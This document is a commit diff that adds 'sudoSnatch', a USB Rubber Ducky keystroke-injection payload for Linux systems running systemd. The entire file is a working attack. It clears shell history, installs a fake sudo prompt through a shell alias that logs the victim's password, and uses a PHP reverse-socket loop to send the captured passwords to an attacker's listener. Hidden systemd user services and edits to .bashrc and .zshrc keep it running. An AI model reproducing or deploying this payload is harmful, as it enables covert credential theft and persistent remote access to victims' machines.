uploaded sudoSnatch

RubberDucky version, optimized and fast.

payloads/library/credentials/sudoSnatch/payload.txt

@@ -0,0 +1,84 @@
+REM Title: sudoSnatch
+REM Description: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally..
+REM AUTHOR: drapl0n
+REM Version: 1.0
+REM Category: Credentials
+REM Target: Unix-like operating systems with systemd
+REM Attackmodes: HID
+REM Note: Replace IP address and port number on line no. 34 with yours.
+REM Note: Use command: [nc -l -p <port number>] to fetch captured passwords on attacking machine.
+
+REM [keeping tracks clear]
+DELAY 500
+CTRL-ALT t
+DELAY 400
+STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
+ENTER
+DELAY 100
+
+REM [creating password grabbing mechanism]
+STRING mkdir /var/tmp/.system
+ENTER
+DELAY 100
+STRING echo -e "#\!/bin/bash\necho -n \"[sudo] password for \$(whoami):\"\nIFS=\"\" read -s pass\necho -e \"Timestamp=[\$(date)] \\\t User=[\$(whoami)] \\\t Password=[\$pass]\" >> /var/tmp/.system/sysLog\necho -e \"\\\nSorry, try again.\"" > /var/tmp/.system/systemMgr
+ENTER
+DELAY 100
+STRING touch /var/tmp/.system/sysLog
+ENTER
+DELAY 100
+STRING chmod +x /var/tmp/.system/systemMgr
+ENTER
+DELAY 100
+
+REM [creating reverse shell]
+STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" >  /var/tmp/.system/systemBus
+ENTER
+DELAY 100
+STRING chmod +x /var/tmp/.system/systemBus
+ENTER
+DELAY 100
+
+REM [creating systemd service to execute payload on boot]
+STRING mkdir -p ~/.config/systemd/user
+ENTER
+DELAY 200
+STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+ENTER
+DELAY 100
+
+REM [creating reboot script incase if listner stops or targets internet connection gets lost] 
+STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
+ENTER
+DELAY 100
+STRING chmod +x /var/tmp/.system/reboot
+ENTER
+DELAY 100
+
+REM [creating systemd service for reboot]
+STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service
+ENTER
+DELAY 100
+
+REM [enabling services]
+STRING systemctl --user daemon-reload
+ENTER
+DELAY 300
+STRING systemctl --user enable --now systemBUS.service
+ENTER
+DELAY 150
+STRING systemctl --user start --now systemBUS.service
+ENTER
+DELAY 150
+STRING systemctl --user enable --now reboot.service
+ENTER
+DELAY 150
+STRING systemctl --user start --now reboot.service
+ENTER
+DELAY 100
+
+REM [autostarting service on terminal/shell launch]
+STRING echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.zshrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.bashrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.bashrc\nfi" > ~/tmmmp
+ENTER
+DELAY 100
+STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
+ENTER